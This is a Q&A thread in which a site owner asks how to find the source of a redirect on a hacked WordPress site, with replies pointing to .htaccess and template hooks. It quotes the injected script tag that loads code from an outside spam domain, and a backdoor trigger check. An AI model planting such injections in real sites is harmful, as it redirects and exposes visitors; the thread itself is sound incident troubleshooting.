# Wordpress site hacked - phantom url

Tags: javascript, php, wordpress

My wordpress website was hacked recently, I've cleaned up the backdoor scripts which were left there however there seems to be some kind of phantom url that doesn't exist in the database at all but if I type it into the site it opens up.

For example:

```
mysite.com/needs-more-tuition
```

Something of that sort however when the page opens, its not a 404 page instead I see a js script that is being run before the HTML is even generated in full and the page redirects to a shady online tuition homework site.

I've looked high and low and even have identified the javascript code that does it but havent been able to find it in the wordpress site install, nor in theme or plugin files.

I'm a bit perplexed here and don't know where to look - from my understanding its echoing the javascript before the opening HTML tag of the page - so its run before the header is compiled or so.

Where exactly should I look for this? I need to get this cleaned up. Google has already penalized my website and I just have a coming soon placeholder there in the meanwhile.

#### HTACCESS

Here is my htaccess file:

```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```

Everything seems normal - I've actually removed al files that had code remniscent of:

```
if(isset($_GET['bot']))
```

Urlwise I have an html file in place there to bypass the `index.php` for now.

#### Affected page details

The phanton url is no where in my database, but the strange thing is that there is content on the page as thought it were a normal wordpress post. However in the html of the page the followng javascript snippet is added at the top of the file even before the opening html tag:

```
<nofollow><noindex><script src="http://essay-oneday.com/?jquery&source=mywebsite.com&keyword=introduction to a film essay"></script></noindex></nofollow><!DOCTYPE html>
```

Comment: the `htaccess` file

Comment: Do u mind giving the url of your site... also are u sure all your plugins are upto date?

Comment: check your wp-config.php and .htaccess file. even check your database..is it safe or modified?

Comment: I also think that is in .htaccess file, if you don see that file turn on "see hidden files and folders"

Comment: Why such confidence that everything is completely cleaned out.

Comment: Well I cleaned out every fie that was an empty file with the code if(isset($_GET['bot'])) - atleast thats why I think Igot allthe back doors out

Comment: Plugins were all upto date last time I checked - please check my answer I added htaccess file

Answer (score 0):

seeing your problem couple of things come to mind. since you are saying your page redirects to another site before the html renders this could mean this could be a result of infected htaccess. if not then this could be a custom template injection. look for `template_include` and `template_redirect` actions. This intruder might be careful enough not to leave any trace of this `needs-more-tution` part. I'd suggest you to look for this text in your database primarily in `wp_posts` table. One possibility could be this is a page/post slug. And then the ID is used in `template_redirect` or `template_include` hook to check for current page and then include this js code to redirect to the url. One other thing. Notice carefully in which url this redirection occurs first. You should also look for that url in both your code and database. After all this is totally hypothetical. without seeing its really hard to comment.

Comment: Thats a strong probability - I'll check and see

Comment: Hello I've actually done that - went through the database and I cannot find the url in the slug or anywhere!

Comment: can you share the url? its really hard to tell without actually seeing it

Comment: Heres the affected url - the fake url that doesnt really exist on the site: goo.gl/ENz2Cb

Comment: this link is blocked.

Comment: The site has been blacklisted you'll have to create an exception in the browser - please also check the update to my question for the malicious code that is being added